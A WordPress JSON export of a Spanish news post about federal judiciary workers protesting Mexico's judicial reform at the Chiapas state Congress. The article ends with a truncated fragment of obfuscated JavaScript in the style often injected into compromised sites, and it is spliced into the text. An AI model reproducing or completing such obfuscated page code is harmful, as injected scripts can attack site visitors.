{"id":17830,"date":"2024-09-12T03:00:48","date_gmt":"2024-09-12T03:00:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17830"},"modified":"2024-09-12T03:00:49","modified_gmt":"2024-09-12T03:00:49","slug":"trabajadores-del-pjf-piden-que-reforma-no-pase-al-estado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17830","title":{"rendered":"Trabajadores del PJF piden que reforma no pase al estado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726109982340-1024x768.jpg\" alt=\"\" class=\"wp-image-17831\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726109982340-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726109982340-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726109982340-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726109982340.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Javier Mart\u00ednez.<\/p>\n\n\n\n<p>11 de septiembre del 2024. Tuxtla Guti\u00e9rrez.- Tras la aprobaci\u00f3n de la Reforma al Poder Judicial, los trabajadores del PJF realizaron una protesta en la entrada principal del Congreso del Estado, para pedir a los legisladores locales no permitir su implementaci\u00f3n en Chiapas.<\/p>\n\n\n\n<p>Cabe recordar que, el pleno del Senado aprob\u00f3 la reforma al Poder Judicial la noche de este mi\u00e9rcoles 11 de septiembre, luego de varias horas de debate y en una sede alterna.<\/p>\n\n\n\n<p>Fueron 86 votos a favor y 41 en contra en votaci\u00f3n econ\u00f3mica, la iniciativa de reforma judicial ser\u00e1 turnada a los Congresos estatales.<\/p>\n\n\n\n<p>Ser\u00e1 en esta etapa en que, la propuesta debe ser aprobada por 17 Congresos para regresar al Poder Ejecutivo y convertirse en ley, a menos de que alg\u00fan amparo o medida legal suspenda sus efectos.<\/p>\n\n\n\n<p>En este sentido, Ram\u00f3n Arias Montes adscrito al Juzgado Sexto de Distrito de Amparo y Juicios Federales en el estado de Chiapas, hizo un llamado a los diputados locales a pensar en el bienestar de los chiapanecos y mexicanos.<\/p>\n\n\n\n<p>\u201cEl Congreso local tiene una gran responsabilidad, la de no dejar pasar esta Reforma que est\u00e1 fundada en mentiras y fue lograda por la presi\u00f3n del partido en turno\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Este mismo mi\u00e9rcoles, se llev\u00f3 a cabo la presentaci\u00f3n de la Reforma al Art\u00edculo Nueve en Materia de Sistema de Cuidados, del Congreso del Estado.<\/p>\n\n\n\n<p>En ese mismo momento, los trabajadores del Poder Judicial de la Federaci\u00f3n, protestaron en las puertas del Poder Legislativo, por lo que tuvo que interrumpirse el foro de discusi\u00f3n.<\/p>\n\n\n\n<p>Cabe destacar que, las protestas se mantienen en Chiapas y el grupo de 100 trabajadores que viajaron al centro del pa\u00eds a unirse a las protestas en el Senado se mantendr\u00e1n.<\/p>\n\n\n\n<p>En este escenario informaron que, una comisi\u00f3n de jueces viaj\u00f3 a Ginebra, Suiza para pedir la intervenci\u00f3n de la ONU y de la Convenci\u00f3n Interamericana de los Derechos Humanos.<\/p>\n\n\n\n<p>Los trabajadores del PJF indicaron que, continuar\u00e1n las protestas e insistir\u00e1n ante las instancias internacionales con la esperanza de poder frenar en la entidad esta medida, que aseguran atenta contra la autonom\u00eda del Poder Judicial.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Javier Mart\u00ednez. 11 de septiembre del 2024. Tuxtla Guti\u00e9rrez.- Tras la aprobaci\u00f3n de la Reforma al Poder Judicial, los trabajadores del PJF realizaron una protesta en la entrada principal del Congreso del Estado, para pedir a los legisladores locales no permitir su implementaci\u00f3n en Chiapas. Cabe recordar que, el pleno del Senado aprob\u00f3 la reforma &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17831,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17830","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17830"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17830\/revisions"}],"predecessor-version":[{"id":17832,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17830\/revisions\/17832"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17831"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17830"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}